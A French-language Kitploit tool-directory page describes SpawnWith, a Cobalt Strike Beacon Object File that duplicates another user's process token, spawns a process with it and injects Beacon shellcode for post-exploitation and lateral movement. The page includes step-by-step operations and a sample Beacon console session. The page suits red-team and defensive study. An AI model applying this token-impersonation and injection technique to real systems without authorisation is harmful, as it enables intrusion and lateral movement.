Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
SpawnWith — Cobalt Strike BOF qui lance un processus en utilisant le jeton d'un autre utilisateur et injecte le shellcode Beacon, permettant la post-exploitation et le mouvement latéral via l'usurpation d'identité. | Kitploit
Outils/GitHubGitHub/rasta-mouse/spawnwith
Escalade de PrivilègesOutils d'ImpersonationMouvement LatéralPost-ExploitationCommandement et Contrôle
GitHubrasta-mouse/spawnwith

SpawnWith

Cobalt Strike BOF qui lance un processus en utilisant le jeton d'un autre utilisateur et injecte le shellcode Beacon, permettant la post-exploitation et le mouvement latéral via l'usurpation d'identité.

Voir le dépôt
11217il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

SpawnWith

Un Beacon Object File (BOF) expérimental qui offre une alternative aux commandes spawnas et inject. Celui-ci expose une nouvelle commande, spawn_with [pid] [listener], qui effectue les opérations suivantes :

  1. Obtient un handle sur le processus cible.
  2. Obtient un handle sur le jeton principal du processus.
  3. Duplique le jeton principal en un jeton d'emprunt d'identité (impersonation token).
  4. Récupère la valeur spawnto du Beacon.
  5. Tente de créer un nouveau processus avec le jeton dupliqué en utilisant CreateProcessWithTokenW.
    • Si cette tentative échoue, essaie CreateProcessAsUserW.
  6. Injecte la charge utile (shellcode) du Beacon dans le processus créé.
    • Établit un lien avec le Beacon dans le cas d'un P2P.

Exemple

root@kitploit:~
beacon> getuid
[*] You are DESKTOP-1U6AHIU\Daniel (admin)

beacon> ps
22656 21972 wordpad.exe   x64   1   DESKTOP-1U6AHIU\test_user

beacon> spawnto x64 %windir%\sysnative\notepad.exe

beacon> spawn_with 22656 tcp-local
[*] Task Beacon to run windows/beacon_bind_tcp (127.0.0.1:4444)
[+] received output:

Spawned PID 45668 and injected 297472 bytes

[+] established link to child beacon: 192.168.0.195

Beacons

Télécharger l’outil